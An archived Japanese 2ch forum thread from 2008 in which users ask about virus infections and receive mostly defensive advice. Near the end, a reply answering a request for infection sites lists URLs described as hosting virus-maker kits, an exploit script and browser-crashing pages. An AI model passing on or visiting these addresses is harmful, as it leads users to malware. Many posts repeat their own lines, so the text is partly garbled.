【ウィルス情報質問 総合スレッド★Part46】
142 :名無しさん@お腹いっぱい。:
PCを起動すると勝手に音楽が始まる…。
しかも中国語とかのラップ。気持ち悪いです。
これはウィルスですか?
しかも中国語とかのラップ。気持ち悪いです。
これはウィルスですか?
|
|
|
143 :名無しさん@お腹いっぱい。:2008/11/26(水) 00:54:25
俺のじゃないから問題なし
安心して寝な
安心して寝な
144 :名無しさん@お腹いっぱい。:2008/11/27(木) 00:12:42
145 :名無しさん@お腹いっぱい。:2008/11/27(木) 18:33:12
146 :名無しさん@お腹いっぱい。:2008/11/27(木) 20:15:56
とりあえずIEをリネームして様子見してはどうか
147 : ◆N9P3SuvBPo :2008/11/27(木) 20:52:45
>142
たぶん無意味かと思うけど、
音楽が始まったらタスクマネージャを起動させて、怪しいプロセスが動いてないか確認してみて。
たぶん無意味かと思うけど、
音楽が始まったらタスクマネージャを起動させて、怪しいプロセスが動いてないか確認してみて。
148 :名無しさん@お腹いっぱい。:2008/11/27(木) 21:42:24
>>142
Anvir Task Manager Freeを使って、スタートアップサービスプロセスの怪しいものを全て
Virustotalに投げてみれば?
ちなみに最近Languageに日本語も追加された(多少文字化けあり)。
http://www.anvir.com/
Anvir Task Manager Freeを使って、スタートアップサービスプロセスの怪しいものを全て
Virustotalに投げてみれば?
ちなみに最近Languageに日本語も追加された(多少文字化けあり)。
http://www.anvir.com/
149 :名無しさん@お腹いっぱい。:2008/11/27(木) 22:46:58
【使用OS】 XP Home SP2
【セキュリティソフトと年式】 ウイルスバスター2009
【スパイウェア対策ソフト】 同上
【回線の種類・ルータの有無】 ADSL ルーター有
【具体的な症状】
手動検索を先日かけたところ、『TROJ_MESOUM.AE』というウイルスに感染していると言う通知を受け、隔離したのですが
隔離フォルダから駆除を試したところ、駆除ができませんでした。
削除していいものかよくわからないので、感染していたファイル名を検索していたらこちらを拝見させていただいたので
相談したくて書き込みをさせていただきました。
どうしたらよいのでしょうか?
感染したファイルは
C\WINDOWS\system32\msGDl1.dllです
よろしくお願いいたします。
【セキュリティソフトと年式】 ウイルスバスター2009
【スパイウェア対策ソフト】 同上
【回線の種類・ルータの有無】 ADSL ルーター有
【具体的な症状】
手動検索を先日かけたところ、『TROJ_MESOUM.AE』というウイルスに感染していると言う通知を受け、隔離したのですが
隔離フォルダから駆除を試したところ、駆除ができませんでした。
削除していいものかよくわからないので、感染していたファイル名を検索していたらこちらを拝見させていただいたので
相談したくて書き込みをさせていただきました。
どうしたらよいのでしょうか?
感染したファイルは
C\WINDOWS\system32\msGDl1.dllです
よろしくお願いいたします。
150 :名無しさん@お腹いっぱい。:2008/11/28(金) 01:57:39
>>142です!
みなさん、親切にありがとうございます。
音楽が流れてもIEが勝手に起動とかはしてないです。
でも、タスクマネージャーのプロセスを確認したら、IEが動いてました。
(画面上では起動されてません)
そしてCPU稼動率が100%になってました。
みなさんに教えてもらったことを試してみますね!
また結果報告に来ます。
ちなみに、音楽はかからない時もあります。
急にかかったり、繰り返しかかったり、一度で終わる時もあります。
みなさん、親切にありがとうございます。
音楽が流れてもIEが勝手に起動とかはしてないです。
でも、タスクマネージャーのプロセスを確認したら、IEが動いてました。
(画面上では起動されてません)
そしてCPU稼動率が100%になってました。
みなさんに教えてもらったことを試してみますね!
また結果報告に来ます。
ちなみに、音楽はかからない時もあります。
急にかかったり、繰り返しかかったり、一度で終わる時もあります。
151 :名無しさん@お腹いっぱい。:2008/11/28(金) 12:45:25
スレイプニルでネット巡回中、突然「こんにちは!こんにちは!」というポップアップ表示がでてきました。
これは最近流行のウィルスだったりします?
これは最近流行のウィルスだったりします?
152 :名無しさん@お腹いっぱい。:2008/11/28(金) 12:46:23
ああ、やばいな
153 :名無しさん@お腹いっぱい。:2008/11/28(金) 14:26:46
はまちちゃんだな
154 :名無しさん@お腹いっぱい。:2008/11/29(土) 02:54:11
ルックルックこんにちはだな
155 :名無しさん@お腹いっぱい。:2008/11/29(土) 10:39:11
USBをさしたらウイルスソフトの反応があってRECYCLERというフォルダとAutorun.infがありました
一応、USBの中のそのフォルダとファイルは削除してPCはシステムの復元をしました
するべき対処として他になにかするべきことはありますか?
OS初期化したほうがいいでしょうか?
一応、USBの中のそのフォルダとファイルは削除してPCはシステムの復元をしました
するべき対処として他になにかするべきことはありますか?
OS初期化したほうがいいでしょうか?
156 : ◆0fQkHdNop2 :2008/11/29(土) 12:08:36
>>155
USBによる自動実行ウィルス(USBワーム)でしょうけど、ウィルス対策
ソフトが検知したので、少なくともそのUSBワーム本体の実行前に防御して
くれてるはずです。
ただし、可能性は低いですが、防御が攻撃の自動実行司令ファイル
「autorun.inf」読み込み後でそのUSBワーム本体実行前になされた場合で、
しかも、そのUSBワーム本体以外にウィルス対策ソフトに未反応の別の
ウィルスや攻撃コード等が他にあった場合にはウィルス対策ソフトが
防ぎきれてない事があります。
しかし、その場合でも、システムの復元したので、削除もしくは休眠状態
になってるはずなので、そういう場合でも一応は大丈夫でしょう。
ただし、システムの復元前にネット接続してた場合には、ウィルス対策
ソフト未対応の別のウィルスや攻撃コードが他にあった場合に備えて
パスワード変更を推奨します。また、システムの復元の感染後の復元
ポイントにはUSBワームが含まれているので、システムの復元を
一旦無効にして、その後、再度有効にしてください。(方法が
わからない場合は自分で調べてください。)
尚、そのパソコンに重要機密とか大金のからむパスワードとか流出すると
人生破滅するような情報があれば、万が一を考えて自己責任でリカバリ
するか否かを考慮してください。
また、USBワームの感染経路も調べる事を推奨します。
USBによる自動実行ウィルス(USBワーム)でしょうけど、ウィルス対策
ソフトが検知したので、少なくともそのUSBワーム本体の実行前に防御して
くれてるはずです。
ただし、可能性は低いですが、防御が攻撃の自動実行司令ファイル
「autorun.inf」読み込み後でそのUSBワーム本体実行前になされた場合で、
しかも、そのUSBワーム本体以外にウィルス対策ソフトに未反応の別の
ウィルスや攻撃コード等が他にあった場合にはウィルス対策ソフトが
防ぎきれてない事があります。
しかし、その場合でも、システムの復元したので、削除もしくは休眠状態
になってるはずなので、そういう場合でも一応は大丈夫でしょう。
ただし、システムの復元前にネット接続してた場合には、ウィルス対策
ソフト未対応の別のウィルスや攻撃コードが他にあった場合に備えて
パスワード変更を推奨します。また、システムの復元の感染後の復元
ポイントにはUSBワームが含まれているので、システムの復元を
一旦無効にして、その後、再度有効にしてください。(方法が
わからない場合は自分で調べてください。)
尚、そのパソコンに重要機密とか大金のからむパスワードとか流出すると
人生破滅するような情報があれば、万が一を考えて自己責任でリカバリ
するか否かを考慮してください。
また、USBワームの感染経路も調べる事を推奨します。
157 : ◆0fQkHdNop2 :2008/11/29(土) 12:28:57
>>155
今後の事を考えて自動再生をオフにされる事を推奨します。
http://windowshelp.microsoft.com/Windows/ja-JP/Help/40f23376-1351-49d5-8d48-5c05d35f2ac81041.mspx
今後の事を考えて自動再生をオフにされる事を推奨します。
http://windowshelp.microsoft.com/Windows/ja-JP/Help/40f23376-1351-49d5-8d48-5c05d35f2ac81041.mspx
158 :名無しさん@お腹いっぱい。:2008/11/29(土) 17:32:02
159 :名無しさん@お腹いっぱい。:2008/11/29(土) 18:44:02
その方が賢明だねw
160 :名無しさん@お腹いっぱい。:2008/12/04(木) 17:13:06
ウィルスバスターがウィルスの定義ファイル更新したら
リアルタイム検索つけてるとBeckyが繋がらなくなったぜ
氏ね
リアルタイム検索つけてるとBeckyが繋がらなくなったぜ
氏ね
161 :名無しさん@お腹いっぱい。:2008/12/04(木) 17:24:04
リアルタイム検索にある
受信メール検索
送信メール検索
を切ったらOKになった
氏ね
受信メール検索
送信メール検索
を切ったらOKになった
氏ね
162 :名無しさん@お腹いっぱい。:2008/12/04(木) 22:26:57
163 :名無しさん@お腹いっぱい。:2008/12/04(木) 22:46:23
>162さんと同じく自分もその症状が出た。
最近いれたflashgetのせいかなって思っていますが…
>162さんはいれてないですか?
最近いれたflashgetのせいかなって思っていますが…
>162さんはいれてないですか?
165 :名無しさん@お腹いっぱい。:2008/12/05(金) 01:02:26
最近MS02-039_SQL_SERVER_RESOLUTION_EXPLOITというウイルスを緊急ブロックしましたという警告が
2時間おきくらいに出て困っています
セキュリティ的には防いで問題ないそうですが、そのたびネット接続が途切れるので
何か改善策はありませんか?
2時間おきくらいに出て困っています
セキュリティ的には防いで問題ないそうですが、そのたびネット接続が途切れるので
何か改善策はありませんか?
166 :名無しさん@お腹いっぱい。:2008/12/05(金) 02:19:42
セキュリティ初心者質問スレッドpart114
http://pc11.2ch.net/test/read.cgi/sec/1225537809/784
784 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/12/05(金) 01:04:18
最近MS02-039_SQL_SERVER_RESOLUTION_EXPLOITというウイルスを緊急ブロックしましたという警告が
2時間おきくらいに出て困っています
セキュリティ的には防いで問題ないそうですが、そのたびネット接続が途切れるので
何か改善策はありませんか?
http://pc11.2ch.net/test/read.cgi/sec/1225537809/784
784 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/12/05(金) 01:04:18
最近MS02-039_SQL_SERVER_RESOLUTION_EXPLOITというウイルスを緊急ブロックしましたという警告が
2時間おきくらいに出て困っています
セキュリティ的には防いで問題ないそうですが、そのたびネット接続が途切れるので
何か改善策はありませんか?
167 :名無しさん@お腹いっぱい。:2008/12/05(金) 12:38:59
168 :名無しさん@お腹いっぱい。:2008/12/05(金) 13:49:11
名前:(c) C:\WINDOWS\system32\dmserver.dll
脅威の名称: (D)W32/Patcher
状態:(E) 1025
パソコンを使っていたらこのようなメッセージが表示されました。
グーグルで調べても詳しいことはよく分かりません。
このウイルスは、一体どのような性質を持っているのか、
また、どれくらい危険なウイルスなのかを教えていただけないでしょうか。
お願いします。
使っているセキュリティーソフトはマカフィーです。
最近行った作業は、
SpywareBlasterやRPGツクールの無料ゲームとランタイムをダウンロードです。
脅威の名称: (D)W32/Patcher
状態:(E) 1025
パソコンを使っていたらこのようなメッセージが表示されました。
グーグルで調べても詳しいことはよく分かりません。
このウイルスは、一体どのような性質を持っているのか、
また、どれくらい危険なウイルスなのかを教えていただけないでしょうか。
お願いします。
使っているセキュリティーソフトはマカフィーです。
最近行った作業は、
SpywareBlasterやRPGツクールの無料ゲームとランタイムをダウンロードです。
169 :名無しさん@お腹いっぱい。:2008/12/05(金) 16:12:30
virustotalに投げてみれば?
170 :名無しさん@お腹いっぱい。:2008/12/05(金) 17:23:21
171 :名無しさん@お腹いっぱい。:2008/12/05(金) 20:55:27
ampfrb.cmdって何ですか?
ドライブ全部にあるんですけど。
ドライブ全部にあるんですけど。
172 :名無しさん@お腹いっぱい。:2008/12/05(金) 21:01:35
173 :名無しさん@お腹いっぱい。:2008/12/06(土) 07:37:49
174 :名無しさん@お腹いっぱい。:2008/12/06(土) 16:13:52
【使用OS】 「XP home sp2」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されてます」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「されてます」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
C:WINDOWS\system32\taskmagr.exe
さきほどPCを立ち上げたところ、上記のファイルから
TROJ_AGENT_APXというトロイが見つかりました、と表示され
ウィルスバスターで隔離しましたが、トレンドマイクロにも上記トロイの情報は無く
駆除ができません。
どのようなウィルスかもわからず不安です。今後どのように対処すべきでしょうか?
【使用セキュリティソフトとバージョン】 「ウィルスバスター2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されてます」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「されてます」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
C:WINDOWS\system32\taskmagr.exe
さきほどPCを立ち上げたところ、上記のファイルから
TROJ_AGENT_APXというトロイが見つかりました、と表示され
ウィルスバスターで隔離しましたが、トレンドマイクロにも上記トロイの情報は無く
駆除ができません。
どのようなウィルスかもわからず不安です。今後どのように対処すべきでしょうか?
175 :名無しさん@お腹いっぱい。:2008/12/06(土) 17:06:13
ウイルスの命名はベンダーでばらばらなんだから
トレンドマイクロの検出名はトレンドマイクロにしかわからんだろ。
バスタースレで。
トレンドマイクロの検出名はトレンドマイクロにしかわからんだろ。
バスタースレで。
176 :名無しさん@お腹いっぱい。:2008/12/06(土) 18:46:58
177 :名無しさん@お腹いっぱい。:2008/12/06(土) 20:34:09
>>173
返答有難うございます。
以前からいれられてるんですね。
flashget入れてから頻繁にウイルスが見つかったもので…
なにやらflashgetを起動させると頻繁に中国のサイトにアクセスしていたりしたので。
返答有難うございます。
以前からいれられてるんですね。
flashget入れてから頻繁にウイルスが見つかったもので…
なにやらflashgetを起動させると頻繁に中国のサイトにアクセスしていたりしたので。
178 : ◆N9P3SuvBPo :2008/12/06(土) 22:03:27
>177
その中国のサイトを教えてくださいな。
あ、頭のhtは抜いて。
その中国のサイトを教えてくださいな。
あ、頭のhtは抜いて。
179 :名無しさん@お腹いっぱい。:2008/12/07(日) 00:03:33
中華製のスパイウェアソフトを入れるほうが悪い
いますぐアンインストールしろよ
中華製のソフトは使わないことだな
いますぐアンインストールしろよ
中華製のソフトは使わないことだな
180 :名無しさん@お腹いっぱい。:2008/12/07(日) 01:34:54
↑バスター使い
181 :名無しさん@お腹いっぱい。:2008/12/07(日) 03:26:00
>>178
詳しくは分かりませんが、
PeerGuardian2で動向を監視したところ、
China IP
China Education and Research Network
fake emule servers
(Spam) ServerBeach
等が頻繁にブロックされていました。
尚、flashgetを終了すると↑へのアクセスは止まりました。
詳しくは分かりませんが、
PeerGuardian2で動向を監視したところ、
China IP
China Education and Research Network
fake emule servers
(Spam) ServerBeach
等が頻繁にブロックされていました。
尚、flashgetを終了すると↑へのアクセスは止まりました。
182 :名無しさん@お腹いっぱい。:2008/12/07(日) 03:30:54
183 :名無しさん@お腹いっぱい。:2008/12/07(日) 08:23:06
flashgetのバージョンが古くないか
184 :名無しさん@お腹いっぱい。:2008/12/07(日) 12:29:25
>>182
自分でもすぐ調べては見たのですが、
やはりスパイウェア仕込んでることで有名みたいですね。
なにか、いつかのバージョンから無くなったとか書いてあったのですが…
>>183
VectorでダウンロードしたFlashGet1.9.6です。
自分でもすぐ調べては見たのですが、
やはりスパイウェア仕込んでることで有名みたいですね。
なにか、いつかのバージョンから無くなったとか書いてあったのですが…
>>183
VectorでダウンロードしたFlashGet1.9.6です。
185 :名無しさん@お腹いっぱい。:2008/12/07(日) 18:21:11
A.状況
【使用OS】 「Xp SP2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「AVG Free 8.0」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新されている」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「無」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「(1)ファイルをコピーしようとしたら、次のメッセージが表示された
アクセスしたファイルは感染しています。
ファイル名:C\System Volume Information\_restore{667B7FC2-A2DB-4c51-9B6c-1A4ECAE5387C}\RP295\A0038262.exe
脅威名:トロイの木馬 PSW.OnlineGames.2.S
オープン時に検出されました
処理名:C\WINDOWS\System32\svchost.exe
処理ID:1320
(2)スキャンしたら、
a.上記ファイル名の最後が次のものが5件表示され、
A0038268.exe 1件
A0038262.exe 3件
A0039185.exe 1件
b.その後、次のメッセージが表示された
D:\System Volume Information\_restore\_restore{667B7FC2-A2DB-4C51-9B6C-1A4ECAE5387C}\RP295\A0038211.exe
c.最後に、
検出された感染 66
除去または修復された感染オブジェクト 66
警告数 70
その他 0
【使用OS】 「Xp SP2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「AVG Free 8.0」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新されている」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「無」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「(1)ファイルをコピーしようとしたら、次のメッセージが表示された
アクセスしたファイルは感染しています。
ファイル名:C\System Volume Information\_restore{667B7FC2-A2DB-4c51-9B6c-1A4ECAE5387C}\RP295\A0038262.exe
脅威名:トロイの木馬 PSW.OnlineGames.2.S
オープン時に検出されました
処理名:C\WINDOWS\System32\svchost.exe
処理ID:1320
(2)スキャンしたら、
a.上記ファイル名の最後が次のものが5件表示され、
A0038268.exe 1件
A0038262.exe 3件
A0039185.exe 1件
b.その後、次のメッセージが表示された
D:\System Volume Information\_restore\_restore{667B7FC2-A2DB-4C51-9B6C-1A4ECAE5387C}\RP295\A0038211.exe
c.最後に、
検出された感染 66
除去または修復された感染オブジェクト 66
警告数 70
その他 0
186 :185(続き):2008/12/07(日) 18:22:29
(3)USBメモリーをコマンドプロンプトでattrib表示すると
SHR autorun.inf SHR f.exeが表示される。
(4)フォルダオプションで、「すべてのファイルとフォルダを表示する」にチェックして
[適用]→[OK]をした後、フォルダオプションを確認すると
「隠しファイルおよび隠しフォルダを表示しない」に変わっている。
(5)マイコンピュータでハードディスクアイコンをダブルクリックすると
何で開くか聞いてくる。
(6)外付けのポータブルディスク3台も感染している模様。」
B.質問
1.どういうウィルスに感染しているのでしょうか?
(1)1種類なのか複数なのか分かりません。
(2)PSW.OnlineGames.xxxというのはあるのですが、
PSW.OnlineGames.2.Sというのは見つかりません。
2.対策は、どうすれば良いのでしょうか?
宜しくお願いします。
SHR autorun.inf SHR f.exeが表示される。
(4)フォルダオプションで、「すべてのファイルとフォルダを表示する」にチェックして
[適用]→[OK]をした後、フォルダオプションを確認すると
「隠しファイルおよび隠しフォルダを表示しない」に変わっている。
(5)マイコンピュータでハードディスクアイコンをダブルクリックすると
何で開くか聞いてくる。
(6)外付けのポータブルディスク3台も感染している模様。」
B.質問
1.どういうウィルスに感染しているのでしょうか?
(1)1種類なのか複数なのか分かりません。
(2)PSW.OnlineGames.xxxというのはあるのですが、
PSW.OnlineGames.2.Sというのは見つかりません。
2.対策は、どうすれば良いのでしょうか?
宜しくお願いします。
187 :名無しさん@お腹いっぱい。:2008/12/07(日) 18:41:28
188 :名無しさん@お腹いっぱい。:2008/12/07(日) 18:59:59
>>185
ttp://mm113.blog49.fc2.com/blog-entry-14.html
ttp://www.cyber-concierge.co.jp/pc_tama/other/revo.html
ttp://mm113.blog49.fc2.com/blog-entry-14.html
ttp://www.cyber-concierge.co.jp/pc_tama/other/revo.html
189 :185:2008/12/08(月) 08:12:59
190 :185:2008/12/08(月) 11:04:20
autorun.infを止める方法についての追加質問です。
次の2つの方法がネットに書かれていたのですが、
このウィルスの対策としては、どちらが良いのでしょうか?
(1)グループポリシーの設定を変える
[ファイル名を指定して実行]→gpedit.msc入力→[コンピュータの構成]
→[管理用テンプレート]→[システム]→[自動再生機能をオフにする]
→[プロパティ]→[自動再生機能をオフにする]→[適用]→[OK]
(2)レジストリを変える
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT
\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist"
宜しくお願いします。
次の2つの方法がネットに書かれていたのですが、
このウィルスの対策としては、どちらが良いのでしょうか?
(1)グループポリシーの設定を変える
[ファイル名を指定して実行]→gpedit.msc入力→[コンピュータの構成]
→[管理用テンプレート]→[システム]→[自動再生機能をオフにする]
→[プロパティ]→[自動再生機能をオフにする]→[適用]→[OK]
(2)レジストリを変える
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT
\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist"
宜しくお願いします。
191 :名無しさん@お腹いっぱい。:2008/12/08(月) 18:21:11
192 :名無しさん@お腹いっぱい。:2008/12/08(月) 19:26:53
俺はTweakUIで潰してるな
193 :185:2008/12/08(月) 20:26:35
>>191
レスありがとうございます。
レスありがとうございます。
194 :名無しさん@お腹いっぱい。:2008/12/09(火) 13:35:27
【使用OS】「vista」
【MUの状態】「最新」
【使用セキュリティソフトとバージョン】「光回線でデフォでついてきたNTT西日本セキュリティ対策ツールver15」
【最新か】「最新」
【スパイウェア対策ソフトと状態】「同上」
【スキャンの結果何が検索されたか】「このソフトだと何も検索されない」
だった訳ですが(続く)
【MUの状態】「最新」
【使用セキュリティソフトとバージョン】「光回線でデフォでついてきたNTT西日本セキュリティ対策ツールver15」
【最新か】「最新」
【スパイウェア対策ソフトと状態】「同上」
【スキャンの結果何が検索されたか】「このソフトだと何も検索されない」
だった訳ですが(続く)
195 :名無しさん@お腹いっぱい。:2008/12/09(火) 13:42:47
ありゃバスターなのでバスタースレでどうぞ。
ある日突然立ち上がった(購入後半年で初めて)
ノートンsecurity scanによると
【検出されたウイルス】「Unix.penguin
感染場所はJane styleの生活板のログ
JS.Windowbomb
感染場所はJane styleのどこか」
専ブラ使ってるので>>8とは違うのでしょうか?
無償のスキャナで除去不能とか言われるし常駐のソフトでは検出されないしいったいどうしたらという感じです
ノートンsecurity scanによると
【検出されたウイルス】「Unix.penguin
感染場所はJane styleの生活板のログ
JS.Windowbomb
感染場所はJane styleのどこか」
専ブラ使ってるので>>8とは違うのでしょうか?
無償のスキャナで除去不能とか言われるし常駐のソフトでは検出されないしいったいどうしたらという感じです
197 :名無しさん@お腹いっぱい。:2008/12/09(火) 14:36:30
ノートンお得意の2ch専ブラログの誤検知だろ
198 :名無しさん@お腹いっぱい。:2008/12/09(火) 22:17:33
199 :名無しさん@お腹いっぱい。:2008/12/10(水) 02:51:09
C:\WINDOWS\system32\sens.dll
W32/Patcher
調べても情報が出てきません。
どなたか駆除方法をご存知ありませんか?
W32/Patcher
調べても情報が出てきません。
どなたか駆除方法をご存知ありませんか?
200 :名無しさん@お腹いっぱい。:2008/12/10(水) 07:57:26
【使用OS】 「xp sp3」
【Microsoft Update(MU)の状態】 「最新」
先ほど自動更新でアップデートしたら
悪意のあるソフトウェアの削除ツールで、
TrojanDropper:Win32/Renos.N
なるものが削除されました。
ぐぐても、どんなウィルスなのかいまいちわかりません
これはどんなウィルスなんですか?
よろしくお願いします。
【Microsoft Update(MU)の状態】 「最新」
先ほど自動更新でアップデートしたら
悪意のあるソフトウェアの削除ツールで、
TrojanDropper:Win32/Renos.N
なるものが削除されました。
ぐぐても、どんなウィルスなのかいまいちわかりません
これはどんなウィルスなんですか?
よろしくお願いします。
201 :名無しさん@お腹いっぱい。:2008/12/10(水) 12:27:32
3.0mod3-3.54-setup.exe
a0030828.exe
バスター2009でこの二つがウイルスだって出た
3.0mod3-3.54-setup.exeがWINMXのパッチなのは分かったけど
a0030828.exeが何なのかわからん?
誰か教えてくれ
a0030828.exe
バスター2009でこの二つがウイルスだって出た
3.0mod3-3.54-setup.exeがWINMXのパッチなのは分かったけど
a0030828.exeが何なのかわからん?
誰か教えてくれ
202 :名無しさん@お腹いっぱい。:2008/12/10(水) 13:07:15
>>199
sens.dllでググれ
sens.dllでググれ
203 :名無しさん@お腹いっぱい。:2008/12/10(水) 13:46:11
>>201
パスがSystem Volume Information以下だったら、システムの復元のバックアップファイル。
>>200
Renosでググれ。
>>199
誤検出でなければ、sens.dllが改変されてる。
セキュリティソフトで修復出来なかったら、早くリカバリした方がいいよ。
パスがSystem Volume Information以下だったら、システムの復元のバックアップファイル。
>>200
Renosでググれ。
>>199
誤検出でなければ、sens.dllが改変されてる。
セキュリティソフトで修復出来なかったら、早くリカバリした方がいいよ。
204 :名無しさん@お腹いっぱい。:2008/12/10(水) 14:40:26
研究でウィルスの検体が大量に欲しいのですが、どこかにzipファイルなどでウイルスをゲットできるサイトありませんか?
205 :名無しさん@お腹いっぱい。:2008/12/10(水) 17:39:18
>>204
それくらい自分で探そうね。
それくらい自分で探そうね。
206 :名無しさん@お腹いっぱい。:2008/12/10(水) 23:28:56
困っています。下記がバスターコーポレーションで検出
dmserv.dll
C:\WINDOWS\system32\の中で
隔離削除できないため困っています。
セーフモードでもだめでした、何かOS入れ直さないで
修復できる方法ありませんか?
dmserv.dll
C:\WINDOWS\system32\の中で
隔離削除できないため困っています。
セーフモードでもだめでした、何かOS入れ直さないで
修復できる方法ありませんか?
207 : ◆N9P3SuvBPo :2008/12/11(木) 00:06:51
>206
案内レス
企業用PCでしょうか?
もしそうならシステム管理者にご報告を
案内レス
企業用PCでしょうか?
もしそうならシステム管理者にご報告を
208 :名無しさん@お腹いっぱい。:2008/12/11(木) 07:06:04
ウイルスリムーバーをこらしめたいが
209 :名無しさん@お腹いっぱい。:2008/12/11(木) 07:51:56
>167 さん
聞こえなくなくったからと言って安心できませんよ。僕も12/4日くらいに取りつかれ、英語交じりの中国語のラジオ放送みたいなのと、クリック音が連続して聞こえる現象がありましたが、断続的で3日ほ現象が無かったのです。どうも夜8時頃に起動すればそうした現象が
出て、他の時間帯ではそうではなありませんでした。Flash getは直ちに削除しましたが、新しすぎるためなのかウィルスセキュリティでは検出できず、いろいろな体験版で対処中です。
聞こえなくなくったからと言って安心できませんよ。僕も12/4日くらいに取りつかれ、英語交じりの中国語のラジオ放送みたいなのと、クリック音が連続して聞こえる現象がありましたが、断続的で3日ほ現象が無かったのです。どうも夜8時頃に起動すればそうした現象が
出て、他の時間帯ではそうではなありませんでした。Flash getは直ちに削除しましたが、新しすぎるためなのかウィルスセキュリティでは検出できず、いろいろな体験版で対処中です。
210 :名無しさん@お腹いっぱい。:2008/12/12(金) 19:45:24
>>203
THX
System Volume Informationだから
システムの復元のバックアップファイルなのか?
なんでウイルス扱いなんだ?
隔離してるって出てるけどどうなるんだろう?
更新でソフトを新しく入れるとこんなのばっかり・・・
THX
System Volume Informationだから
システムの復元のバックアップファイルなのか?
なんでウイルス扱いなんだ?
隔離してるって出てるけどどうなるんだろう?
更新でソフトを新しく入れるとこんなのばっかり・・・
211 :名無しさん@お腹いっぱい。:2008/12/13(土) 01:05:56
いまエクスプローラで作業しているのだが
s2.com
ってウィルスかな? ドライブ全てにいるのだが、前からあったかな…
ググッテモよく分からないし…ソース頼む
s2.com
ってウィルスかな? ドライブ全てにいるのだが、前からあったかな…
ググッテモよく分からないし…ソース頼む
212 :名無しさん@お腹いっぱい。:2008/12/13(土) 06:11:09
amvoをうつされたので下のサイトの通りに削除。
その後DドライブにRECYCLERとSystem Volume Informationが出てきたんだけど、これって何で?
今までは「全てのフォルダを表示する」にしてても表示されなかったのに。
ttp://pc11.2ch.net/test/read.cgi/sec/1224511070/l50
その後DドライブにRECYCLERとSystem Volume Informationが出てきたんだけど、これって何で?
今までは「全てのフォルダを表示する」にしてても表示されなかったのに。
ttp://pc11.2ch.net/test/read.cgi/sec/1224511070/l50
213 :名無しさん@お腹いっぱい。:2008/12/13(土) 06:13:26
↑winXPSP3です。すまそ。
214 :名無しさん@お腹いっぱい。:2008/12/13(土) 10:20:04
>>206
OSがファイルをつかんでしまっているためだと思います。
マイコンピュータ右クリック→管理→サービスとアプリケーション
→サービス
サービスの中に怪しい文字列(意味のない文字列)があったら
それをダブルクリック、スタートアップの種類を「無効」にして一度パソコンを再起動、
それからもう一度system32フォルダをコーポレートエディションでスキャン、
これでうちの会社はできましたよ。
一度やってみてください。
OSがファイルをつかんでしまっているためだと思います。
マイコンピュータ右クリック→管理→サービスとアプリケーション
→サービス
サービスの中に怪しい文字列(意味のない文字列)があったら
それをダブルクリック、スタートアップの種類を「無効」にして一度パソコンを再起動、
それからもう一度system32フォルダをコーポレートエディションでスキャン、
これでうちの会社はできましたよ。
一度やってみてください。
215 :名無しさん@お腹いっぱい。:2008/12/13(土) 10:21:31
システムの復元については機能をとりあえずOFFにするといいと思います。
OSの復元はできませんが最悪再セットアップすればいい話なので。
OSの復元はできませんが最悪再セットアップすればいい話なので。
216 :名無しさん@お腹いっぱい。:2008/12/13(土) 21:34:35
自分のパソコンがどれだけ防御力が高いかためしたい。
ためしにウイルスに感染できるホームページとかないですか?
当然バックアップしてから挑みます。
自分の防御力を調べてみたいって人少ないのかなあ。
ためしにウイルスに感染できるホームページとかないですか?
当然バックアップしてから挑みます。
自分の防御力を調べてみたいって人少ないのかなあ。
217 :名無しさん@お腹いっぱい。:2008/12/13(土) 22:04:21
218 :名無しさん@お腹いっぱい。:2008/12/13(土) 22:28:37
219 :名無しさん@お腹いっぱい。:2008/12/13(土) 22:57:54
【激しく既出、危険なサイト一覧=ウイルス、ブラクラ系】
1. //www.hackpalace.com/virii/makers/ (ウィルス)
2. //ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm (ウィルスJS_PETCH.A:セキュリティホールを突いたWMP破壊スクリプト)
3. //easyweb.easynet.co.uk/~hiros/**** (****以降はウイルス名:ウイルス)
4. //www2.strangeworld.org/uedakana/sahra****.*** (****は番号違い、拡張子違いなど:ブラクラ&ウイルス:HTML_SUAR.)
5. //amilala.blogspot.com (ウイルスJS_AMILALA.A作成者のサイト。有害なスクリプトが仕掛けられる可能性あり)
6. //www.kogalu.com/sou/girls/index2.htm (通常はエロサイトだがブラクラ&ウイルスの場合あり)
7. //raus.de/crashme/ (ブラクラ&ウイルス)
8. //www.albinoblacksheep.com/flash/you.html (ブラクラ:Windowオープン/ゾンビ ウィンドウ/無限JavaScriptループ)
9. //www.albinoblacksheep.com/flash/open.html (8と同じです)
10. //www.youareanidiot.org/ (8と同じです)
11. //cfi.hyo-ka.net/kiki01.htm(ブラクラ:Windowオープン。ドクロの壁紙)
1. //www.hackpalace.com/virii/makers/ (ウィルス)
2. //ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm (ウィルスJS_PETCH.A:セキュリティホールを突いたWMP破壊スクリプト)
